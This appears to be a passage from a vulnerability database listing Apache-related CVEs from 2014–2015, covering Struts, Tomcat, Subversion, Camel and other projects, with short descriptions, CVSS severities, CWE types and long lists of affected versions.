apache hadoop 0.23.7
apache hadoop 2.0.0
apache hadoop 2.2.0
apache hadoop 2.0.6
apache hadoop 2.0.3
apache hadoop 0.23.1
apache hadoop 2.0.1
apache hadoop 0.23.6
apache hadoop 0.23.5
apache hadoop 2.1.0
apache hadoop 2.1.1
apache hadoop 0.23.11
apache hadoop 2.3.0
apache hadoop 2.5.1
apache hadoop 0.23.10
apache hadoop 2.0.4
apache hadoop 2.4.0
apache hadoop 0.23.0
apache hadoop 0.23.9
CVE-2014-3628 MEDIUM

Cross-site scripting (XSS) vulnerability in the Admin UI Plugin / Stats page in Apache Solr 4.x before 4.10.3 allows remote attackers to inject arbitrary web script or HTML via the fieldvaluecache object.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache solr 4.2.0
apache solr 4.5.0
apache solr 4.7.2
apache solr 4.10.2
apache solr 4.9.0
apache solr 4.1.0
apache solr 4.6.0
apache solr 4.9.1
apache solr 4.10.0
apache solr 4.0.0
apache solr 4.3.0
apache solr 4.3.1
apache solr 4.8.1
apache solr 4.7.1
apache solr 4.2.1
apache solr 4.10.1
apache solr 4.7.0
apache solr 4.5.1
apache solr 4.4.0
apache solr 4.8.0
apache solr 4.6.1
CVE-2014-3629 MEDIUM

XML external entity (XXE) vulnerability in the XML Exchange module in Apache Qpid 0.30 allows remote attackers to cause outgoing HTTP connections via a crafted message.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid 0.30
CVE-2014-4651 HIGH

It was found that the jclouds scriptbuilder Statements class wrote a temporary file to a predictable location. An attacker could use this flaw to access sensitive data, cause a denial of service, or perform other attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache jclouds *
CVE-2014-7807 MEDIUM

Apache CloudStack 4.3.x before 4.3.2 and 4.4.x before 4.4.2 allows remote attackers to bypass authentication via a login request without a password, which triggers an unauthenticated bind.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache cloudstack 4.3.0
apache cloudstack 4.4.1
apache cloudstack 4.4.0
apache cloudstack 4.3.1
CVE-2014-7808 MEDIUM

Apache Wicket before 1.5.13, 6.x before 6.19.0, and 7.x before 7.0.0-M5 make it easier for attackers to defeat a cryptographic protection mechanism and predict encrypted URLs by leveraging use of CryptoMapper as the default encryption provider.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache wicket 7.0.0
apache wicket *
CVE-2014-7809 MEDIUM

Apache Struts 2.0.0 through 2.3.x before 2.3.20 uses predictable <s:token/> values, which allows remote attackers to bypass the CSRF protection mechanism.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache struts 2.0.2
apache struts 2.0.9
apache struts 2.3.14.1
apache struts 2.3.16.2
apache struts 2.1.5
apache struts 2.2.3.1
apache struts 2.2.1.1
apache struts 2.1.1
apache struts 2.2.1
apache struts 2.0.11.2
apache struts 2.0.11.1
apache struts 2.0.3
apache struts 2.3.15.2
apache struts 2.1.8
apache struts 2.0.13
apache struts 2.3.16.1
apache struts 2.0.12
apache struts 2.3.16.3
apache struts 2.0.14
apache struts 2.0.0
apache struts 2.3.15.1
apache struts 2.3.4.1
apache struts 2.3.3
apache struts 2.0.6
apache struts 2.0.11
apache struts 2.3.1.1
apache struts 2.0.7
apache struts 2.3.14.2
apache struts 2.3.7
apache struts 2.0.8
apache struts 2.3.4
apache struts 2.0.1
apache struts 2.3.14.3
apache struts 2.3.15.3
apache struts 2.1.4
apache struts 2.3.1
apache struts 2.0.5
apache struts 2.3.12
apache struts 2.1.6
apache struts 2.3.8
apache struts 2.0.10
apache struts 2.1.8.1
apache struts 2.0.4
apache struts 2.1.0
apache struts 2.1.3
apache struts 2.3.15
apache struts 2.3.14
apache struts 2.1.2
apache struts 2.3.1.2
apache struts 2.2.3
apache struts 2.3.16
CVE-2014-7810 MEDIUM

The Expression Language (EL) implementation in Apache Tomcat 6.x before 6.0.44, 7.x before 7.0.58, and 8.x before 8.0.16 does not properly consider the possibility of an accessible interface implemented by an inaccessible class, which allows attackers to bypass a SecurityManager protection mechanism via a web application that leverages use of incorrect privileges during EL evaluation.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-284,

Products Affected

Vendor Product Version
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 6.0.43
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 6.0.29
apache tomcat 6.0.37
apache tomcat 7.0.33
apache tomcat 6.0.36
apache tomcat 7.0.3
apache tomcat 6.0.32
apache tomcat 7.0.40
apache tomcat 6.0.4
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 7.0.5
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 6.0.28
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 6.0.33
apache tomcat 7.0.38
apache tomcat 6.0.13
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.7
apache tomcat 6.0.26
apache tomcat 6.0.18
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 6.0.31
apache tomcat 6.0.20
apache tomcat 6.0.30
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
debian debian_linux 7.0
apache tomcat 8.0.8
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 6.0.24
apache tomcat 7.0.53
apache tomcat 6.0.3
apache tomcat 7.0.30
apache tomcat 6.0.14
apache tomcat 6.0.41
apache tomcat 7.0.47
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 7.0.56
apache tomcat 6.0.7
apache tomcat 6.0.1
apache tomcat 6.0.27
apache tomcat 7.0.12
apache tomcat 6.0.8
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 6.0.12
apache tomcat 7.0.28
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 6.0.15
apache tomcat 8.0.5
apache tomcat 7.0.17
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 6.0.17
apache tomcat 7.0.25
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 7.0.19
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 6.0.6
apache tomcat 7.0.20
apache tomcat 6.0.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.26
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 7.0.2
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 6.0.9
apache tomcat 7.0.22
apache tomcat 6.0.35
CVE-2014-8108 MEDIUM

The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.7.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and crash) via a request for a URI that triggers a lookup for a virtual transaction name that does not exist.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache subversion 1.8.0
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
apache subversion 1.7.19
apache subversion 1.7.4
apple xcode 6.1.1
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.1.2
apache subversion 1.4.3
apache subversion 1.0.4
apache subversion 1.0.8
apache subversion 1.7.5
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.0.0
apache subversion 1.6.3
apache subversion 1.5.8
apache subversion 1.2.3
redhat enterprise_linux_server 7.0
apache subversion 1.7.3
apache subversion 1.0.5
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.14
apache subversion 1.6.0
apache subversion 1.5.2
apache subversion 1.6.8
apache subversion 1.2.1
apache subversion 1.7.6
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.4.6
apache subversion 1.6.7
apache subversion 1.4.4
apache subversion 1.3.0
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.0.3
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
apache subversion 1.4.0
apache subversion 1.6.18
apache subversion 1.3.2
apache subversion 1.8.8
apache subversion 1.6.6
redhat enterprise_linux_hpc_node 7.0
apache subversion 1.5.3
apache subversion 1.0.6
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.0.2
apache subversion 1.0.7
apache subversion 1.3.1
apache subversion 1.8.6
apache subversion 1.6.20
apache subversion 1.1.4
apache subversion 1.7.12
apache subversion 1.7.15
apache subversion 1.8.7
apache subversion 1.0.1
apache subversion 1.1.0
apache subversion 1.6.5
apache subversion 1.6.15
apache subversion 1.6.14
apache subversion 1.7.7
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.5.7
apache subversion 1.8.4
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.9
apache subversion 1.0.9
apache subversion 1.6.19
apache subversion 1.7.9
redhat enterprise_linux_desktop 7.0
apache subversion 1.5.4
redhat enterprise_linux_workstation 7.0
apache subversion 1.1.3
apache subversion 1.4.2
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.2.0
apache subversion 1.4.5
apache subversion 1.8.3
apache subversion 1.1.1
apache subversion 1.2.2
apache subversion 1.4.1
CVE-2014-8109 MEDIUM

mod_lua.c in the mod_lua module in the Apache HTTP Server 2.3.x and 2.4.x through 2.4.10 does not support an httpd configuration in which the same Lua authorization provider is used with different arguments within different contexts, which allows remote attackers to bypass intended access restrictions in opportunistic circumstances by leveraging multiple Require directives, as demonstrated by a configuration that specifies authorization for one group to access a certain directory, and authorization for a second group to access a second directory.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-863,

Products Affected

Vendor Product Version
apache http_server 2.4.7
canonical ubuntu_linux 10.04
fedoraproject fedora 21
apache http_server 2.4.2
apache http_server 2.4.6
apache http_server 2.4.4
apache http_server 2.4.3
apache http_server 2.4.10
canonical ubuntu_linux 12.04
apache http_server 2.4.1
oracle enterprise_manager_ops_center 12.2.0
canonical ubuntu_linux 14.04
oracle enterprise_manager_ops_center 12.3.0
apache http_server 2.4.9
canonical ubuntu_linux 14.10
oracle enterprise_manager_ops_center 12.2.1
oracle enterprise_manager_ops_center *
CVE-2014-8110 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the web based administration console in Apache ActiveMQ 5.x before 5.10.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.9.1
CVE-2014-8111 MEDIUM

Apache Tomcat Connectors (mod_jk) before 1.2.41 ignores JkUnmount rules for subtrees of previous JkMount rules, which allows remote attackers to access otherwise restricted artifacts via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat_connectors *
CVE-2014-8152 MEDIUM

Apache Santuario XML Security for Java 2.0.x before 2.0.3 allows remote attackers to bypass the streaming XML signature protection mechanism via a crafted XML document.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-254,

Products Affected

Vendor Product Version
apache santuario_xml_security_for_java 2.0.0
apache santuario_xml_security_for_java 2.0.2
apache santuario_xml_security_for_java 2.0.1
CVE-2014-9527 MEDIUM

HSLFSlideShow in Apache POI before 3.11 allows remote attackers to cause a denial of service (infinite loop and deadlock) via a crafted PPT file.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
fedoraproject fedora 20
apache poi *
CVE-2014-9593 MEDIUM

Apache CloudStack before 4.3.2 and 4.4.x before 4.4.2 allows remote attackers to obtain private keys via a listSslCerts API call.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache cloudstack 4.4.1
apache cloudstack *
apache cloudstack 4.4.0
CVE-2015-0202 HIGH

The mod_dav_svn server in Subversion 1.8.0 through 1.8.11 allows remote attackers to cause a denial of service (memory consumption) via a large number of REPORT requests, which trigger the traversal of FSFS repository nodes.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 1.8.5
apache subversion 1.8.6
apache subversion 1.8.2
apache subversion 1.8.11
opensuse opensuse 13.2
apache subversion 1.8.3
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.8.7
opensuse opensuse 13.1
CVE-2015-0203 MEDIUM

The qpidd broker in Apache Qpid 0.30 and earlier allows remote authenticated users to cause a denial of service (daemon crash) via an AMQP message with (1) an invalid range in a sequence set, (2) content-bearing methods other than message-transfer, or (3) a session-gap control before a corresponding session-attach.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0223 MEDIUM

Unspecified vulnerability in Apache Qpid 0.30 and earlier allows remote attackers to bypass access restrictions on qpidd via unknown vectors, related to 0-10 connection handling.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0224 MEDIUM

qpidd in Apache Qpid 0.30 and earlier allows remote attackers to cause a denial of service (daemon crash) via a crafted protocol sequence set. NOTE: this vulnerability exists because of an incomplete fix for CVE-2015-0203.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-19,

Products Affected

Vendor Product Version
apache qpid *
CVE-2015-0225 HIGH

The default configuration in Apache Cassandra 1.2.0 through 1.2.19, 2.0.0 through 2.0.13, and 2.1.0 through 2.1.3 binds an unauthenticated JMX/RMI interface to all network interfaces, which allows remote attackers to execute arbitrary Java code via an RMI request.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
apache cassandra 1.2.4
apache cassandra 2.0.7
apache cassandra 1.2.2
apache cassandra 2.0.9
apache cassandra 1.2.10
apache cassandra 1.2.11
apache cassandra 2.0.1
apache cassandra 2.0.13
apache cassandra 1.2.0
apache cassandra 1.2.13
apache cassandra 1.2.9
apache cassandra 1.2.12
apache cassandra 1.2.15
apache cassandra 1.2.18
apache cassandra 2.0.0
apache cassandra 1.2.7
apache cassandra 2.0.8
apache cassandra 2.1.2
apache cassandra 2.1.0
apache cassandra 1.2.1
apache cassandra 2.0.2
apache cassandra 1.2.14
apache cassandra 1.2.19
apache cassandra 2.0.3
apache cassandra 2.0.11
apache cassandra 2.1.1
apache cassandra 2.1.3
apache cassandra 1.2.8
apache cassandra 1.2.16
apache cassandra 1.2.6
apache cassandra 2.0.6
apache cassandra 1.2.3
apache cassandra 2.0.12
apache cassandra 1.2.5
apache cassandra 2.0.5
apache cassandra 2.0.4
apache cassandra 2.0.10
apache cassandra 1.2.17
CVE-2015-0226 MEDIUM

Apache WSS4J before 1.6.17 and 2.0.x before 2.0.2 improperly leaks information about decryption failures when decrypting an encrypted key or message data, which makes it easier for remote attackers to recover the plaintext form of a symmetric key via a series of crafted messages. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-2487.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-327,

Products Affected

Vendor Product Version
apache wss4j 2.0
apache wss4j 2.0.0
apache wss4j *
apache wss4j 2.0.1
CVE-2015-0227 MEDIUM

Apache WSS4J before 1.6.17 and 2.x before 2.0.2 allows remote attackers to bypass the requireSignedEncryptedDataElements configuration via a vectors related to "wrapping attacks."

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache wss4j 2.0.0
apache wss4j *
apache wss4j 2.0.1
CVE-2015-0228 MEDIUM

The lua_websocket_read function in lua_request.c in the mod_lua module in the Apache HTTP Server through 2.4.12 allows remote attackers to cause a denial of service (child-process crash) by sending a crafted WebSocket Ping frame after a Lua script has called the wsupgrade function.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 12.04
apple mac_os_x 10.10.4
canonical ubuntu_linux 14.04
canonical ubuntu_linux 10.04
opensuse opensuse 13.2
canonical ubuntu_linux 14.10
apple mac_os_x_server 5.0.3
CVE-2015-0248 MEDIUM

The (1) mod_dav_svn and (2) svnserve servers in Subversion 1.6.0 through 1.7.19 and 1.8.0 through 1.8.11 allow remote attackers to cause a denial of service (assertion failure and abort) via crafted parameter combinations related to dynamically evaluated revision numbers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apple xcode 7.0
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
apache subversion 1.7.4
apache subversion 1.6.17
apache subversion 1.8.6
opensuse opensuse 13.2
redhat enterprise_linux_hpc_node 6
apache subversion 1.6.20
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
redhat enterprise_linux_workstation 6.0
apache subversion 1.6.5
apache subversion 1.6.15
oracle solaris 11.3
apache subversion 1.6.14
apache subversion 1.7.7
redhat enterprise_linux_server_eus 6.7.z
apache subversion 1.7.3
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
CVE-2015-0249 MEDIUM

The weblog page template in Apache Roller 5.1 through 5.1.1 allows remote authenticated users with admin privileges for a weblog to execute arbitrary Java code via crafted Velocity Text Language (aka VTL).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-94,

Products Affected

Vendor Product Version
apache roller 5.1.1
apache roller 5.1.0
CVE-2015-0250 MEDIUM

XML external entity (XXE) vulnerability in the SVG to (1) PNG and (2) JPG conversion classes in Apache Batik 1.x before 1.8 allows remote attackers to read arbitrary files or cause a denial of service via a crafted SVG file.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
canonical ubuntu_linux 12.04
apache batik *
redhat jboss_enterprise_brms_platform *
canonical ubuntu_linux 14.04
canonical ubuntu_linux 14.10
CVE-2015-0251 MEDIUM

The mod_dav_svn server in Subversion 1.5.0 through 1.7.19 and 1.8.0 through 1.8.11 allows remote authenticated users to spoof the svn:author property via a crafted v1 HTTP protocol request sequences.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,

Products Affected

Vendor Product Version
apache subversion 1.6.18
apache subversion 1.8.0
apache subversion 1.8.8
apache subversion 1.6.6
apple xcode 7.0
apache subversion 1.5.3
apache subversion 1.6.11
apache subversion 1.7.11
apache subversion 1.5.0
apache subversion 1.5.1
apache subversion 1.6.2
redhat enterprise_linux_server 6.0
apache subversion 1.7.19
redhat enterprise_linux_hpc_node 6.0
apache subversion 1.7.4
apache subversion 1.5.6
apache subversion 1.6.17
apache subversion 1.8.6
opensuse opensuse 13.2
apache subversion 1.6.20
apache subversion 1.7.5
redhat enterprise_linux_desktop 6.0
apache subversion 1.6.12
apache subversion 1.6.13
apache subversion 1.7.12
apache subversion 1.6.3
apache subversion 1.7.15
apache subversion 1.8.7
redhat enterprise_linux_workstation 6.0
apache subversion 1.6.5
apache subversion 1.5.8
apache subversion 1.6.15
oracle solaris 11.3
apache subversion 1.6.14
apache subversion 1.7.7
redhat enterprise_linux_server_eus 6.7.z
apache subversion 1.7.3
apache subversion 1.5.5
apache subversion 1.6.21
apache subversion 1.7.18
apache subversion 1.8.2
apache subversion 1.8.11
apache subversion 1.5.7
apache subversion 1.7.14
apache subversion 1.8.4
apache subversion 1.8.9
apache subversion 1.6.0
apache subversion 1.6.16
apache subversion 1.7.8
apache subversion 1.5.2
apache subversion 1.8.1
apache subversion 1.8.10
apache subversion 1.6.4
apache subversion 1.6.8
apache subversion 1.6.9
apache subversion 1.7.6
opensuse opensuse 13.1
apache subversion 1.6.19
apache subversion 1.7.9
apache subversion 1.7.13
apache subversion 1.5.4
apache subversion 1.6.23
apache subversion 1.7.16
apache subversion 1.7.1
apache subversion 1.8.5
apache subversion 1.6.7
apache subversion 1.8.3
apache subversion 1.7.10
apache subversion 1.6.10
apache subversion 1.6.1
apache subversion 1.7.17
apache subversion 1.7.0
apache subversion 1.7.2
CVE-2015-0252 MEDIUM

internal/XMLReader.cpp in Apache Xerces-C before 3.1.2 allows remote attackers to cause a denial of service (segmentation fault and crash) via crafted XML data.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 7.1
fedoraproject fedora 20
fedoraproject fedora 21
fedoraproject fedora 22
apache xerces-c++ *
CVE-2015-0253 MEDIUM

The read_request_line function in server/protocol.c in the Apache HTTP Server 2.4.12 does not initialize the protocol structure member, which allows remote attackers to cause a denial of service (NULL pointer dereference and process crash) by sending a request that lacks a method to an installation that enables the INCLUDES filter and has an ErrorDocument 400 directive specifying a local URI.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apple mac_os_x 10.10.4
oracle linux 7
oracle solaris 11.3
apache http_server 2.4.12
apple mac_os_x_server 5.0.3
CVE-2015-0254 HIGH

Apache Standard Taglibs before 1.2.3 allows remote attackers to execute arbitrary code or conduct external XML entity (XXE) attacks via a crafted XSLT extension in a (1) <x:parse> or (2) <x:transform> JSTL XML tag.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache standard_taglibs *
canonical ubuntu_linux 14.04
canonical ubuntu_linux 14.10
CVE-2015-0263 MEDIUM

XML external entity (XXE) vulnerability in the XML converter setup in converter/jaxp/XmlConverter.java in Apache Camel before 2.13.4 and 2.14.x before 2.14.2 allows remote attackers to read arbitrary files via an external entity in an SAXSource.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel *
apache camel 2.14.1
CVE-2015-0264 MEDIUM

Multiple XML external entity (XXE) vulnerabilities in builder/xml/XPathBuilder.java in Apache Camel before 2.13.4 and 2.14.x before 2.14.2 allow remote attackers to read arbitrary files via an external entity in an invalid XML (1) String or (2) GenericFile object in an XPath query.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache camel 2.14.0
apache camel *
apache camel 2.14.1
CVE-2015-0265 MEDIUM

Cross-site scripting (XSS) vulnerability in the Policy Admin Tool in Apache Ranger before 0.5.0 allows remote attackers to inject arbitrary web script or HTML via the HTTP User-Agent header.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-0266 MEDIUM

The Policy Admin Tool in Apache Ranger before 0.5.0 allows remote authenticated users to bypass intended access restrictions via direct access to module URLs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache ranger *
CVE-2015-0899 MEDIUM

The MultiPageValidator implementation in Apache Struts 1 1.1 through 1.3.10 allows remote attackers to bypass intended access restrictions via a modified page parameter.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 1.2.4
apache struts 1.2.7
apache struts 1.3.5
apache struts 1.0.2
apache struts 1.2.9
apache struts 1.3.8
apache struts 1.2.2
apache struts 1.2.6
apache struts 1.3.10
apache struts 1.2.8
apache struts 1.1
apache struts 1.0
CVE-2015-1772 MEDIUM

The LDAP implementation in HiveServer2 in Apache Hive before 1.0.1 and 1.1.x before 1.1.1, as used in IBM InfoSphere BigInsights 3.0, 3.0.0.1, and 3.0.0.2 and other products, mishandles simple unauthenticated and anonymous bind configurations, which allows remote attackers to bypass authentication via a crafted LDAP request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
ibm infosphere_biginsights 3.0.0.1
apache hive 1.1.0
apache hive 1.0.0
ibm infosphere_biginsights 3.0.0.2
ibm infosphere_biginsights 3.0.0.0
CVE-2015-1773 MEDIUM

Cross-site scripting (XSS) vulnerability in asdoc/templates/index.html in Apache Flex before 4.14.1 allows remote attackers to inject arbitrary web script or HTML by providing a crafted URI to JavaScript code generated by the asdoc component.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache flex *
CVE-2015-1774 MEDIUM

The HWP filter in LibreOffice before 4.3.7 and 4.4.x before 4.4.2 and Apache OpenOffice before 4.1.2 allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted HWP document, which triggers an out-of-bounds write.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache openoffice *
fedoraproject fedora 21
debian debian_linux 7.0
redhat enterprise_linux_desktop 6.0
debian debian_linux 8.0
canonical ubuntu_linux 12.04
redhat enterprise_linux_server 6.0
canonical ubuntu_linux 14.04
libreoffice libreoffice 4.4.1
redhat enterprise_linux_workstation 6.0
canonical ubuntu_linux 14.10
libreoffice libreoffice *
libreoffice libreoffice 4.4.0
CVE-2015-1775 MEDIUM

Server-side request forgery (SSRF) vulnerability in the proxy endpoint (api/v1/proxy) in Apache Ambari before 2.1.0 allows remote authenticated users to conduct port scans and access unsecured services via a crafted REST call.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache ambari 1.7.0
apache ambari 1.5.1
apache ambari 2.0.1
apache ambari 1.5.0
apache ambari 2.0.2
apache ambari 1.6.1
apache ambari 2.0.0
apache ambari 1.6.0
CVE-2015-1776 LOW

Apache Hadoop 2.6.x encrypts intermediate data generated by a MapReduce job and stores it along with the encryption key in a credentials file on disk when the Intermediate data encryption feature is enabled, which allows local users to obtain sensitive information by reading the file.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache hadoop 2.6.2
apache hadoop 2.6.4
apache hadoop 2.6.0
apache hadoop 2.6.3
apache hadoop 2.6.1
CVE-2015-1830 MEDIUM

Directory traversal vulnerability in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache activemq 5.6.0
apache activemq 5.11.0
apache activemq 5.3.1
apache activemq 5.4.2
apache activemq 5.11.1
apache activemq 5.8.0
apache activemq 5.9.0
apache activemq 5.5.0
apache activemq 5.4.0
apache activemq 5.4.3
apache activemq 5.1.0
apache activemq 5.3.2
apache activemq 5.3.0
apache activemq 5.0.0
apache activemq 5.10.0
apache activemq 5.10.1
apache activemq 5.5.1
apache activemq 5.7.0
apache activemq 5.2.0
apache activemq 5.4.1
apache activemq 5.10.2
apache activemq 5.9.1
CVE-2015-1831 HIGH

The default exclude patterns (excludeParams) in Apache Struts 2.3.20 allow remote attackers to "compromise internal state of an application" via unspecified vectors.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache struts 2.3.20
CVE-2015-1832 MEDIUM

XML external entity (XXE) vulnerability in the SqlXmlUtil code in Apache Derby before 10.12.1.1, when a Java Security Manager is not in place, allows context-dependent attackers to read arbitrary files or cause a denial of service (resource consumption) via vectors involving XmlVTI and the XML datatype.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,CWE-611,

Products Affected

Vendor Product Version
apache derby 10.10.2.0
apache derby 10.7.1.1
apache derby 10.2.1.6
apache derby 10.1.1.0
apache derby 10.11.1.1
apache derby 10.1.2.1
apache derby 10.8.3.0
apache derby 10.5.1.1
apache derby 10.2.2.0
